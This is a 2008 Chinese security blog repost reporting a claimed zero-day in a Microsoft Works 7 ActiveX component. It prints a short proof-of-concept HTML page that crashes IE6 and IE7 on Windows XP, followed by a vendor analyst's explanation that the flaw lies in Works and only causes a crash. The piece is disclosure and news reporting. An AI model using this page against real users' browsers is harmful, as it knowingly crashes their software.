首页 > 网络安全 > Windows组件0Day漏洞 通杀IE6与IE7浏览器

Windows组件0Day漏洞 通杀IE6与IE7浏览器

2008年4月22日 发表评论 阅读评论

from:neeao's blog
中国IT实验室4月21日报道:近日收到网友发来的邮件,反映了一个Windows 0Day漏洞。并在其博客中给出了相关代码。

[0day]Microsoft Works 7 WkImgSrv.dll crash POC,dll版本7.03.0616.0,IE7+Windows XP SP2 测试通过。

&#91;html&#93;<br />&#91;head&#93;<br />&#91;title&#93;Microsoft Works 7 WkImgSrv.dll crash POC&#91;/title&#93;<br />&#91;script language="JavaScript"&#93;<br /> function payload() {<br /> var num = -1;<br /> obj.WksPictureInterface = num;<br /> }<br /> &#91;/script&#93;<br />&#91;/head&#93;<br />&#91;body onload="JavaScript: return payload();"&#93;<br />&#91;object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj"&#93;<br />&#91;/object&#93;<br />&#91;/body&#93;<br />&#91;/html&#93;

    

与金山专家李铁军联系,得到了珠海研发中心的回复,如下:

近几天网络上流传着一个传说为IE 0DAY的POC代码,在Windows XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部分的Windows XP预装了Microsoft Works,所以就出现了过全补丁系统的漏洞(如华硕易PC 就预装了Microsoft Works)。这段攻击代码会让浏览器崩溃,目前尚不能因此传播恶意软件。

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:Windows组件0Day漏洞 通杀IE6与IE7浏览器
本文地址:http://www.woyigui.cn/2008/04/22/windows-components-0-day-killing-loopholes-and-ie6-browser-ie7/

分类: 网络安全 标签: ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*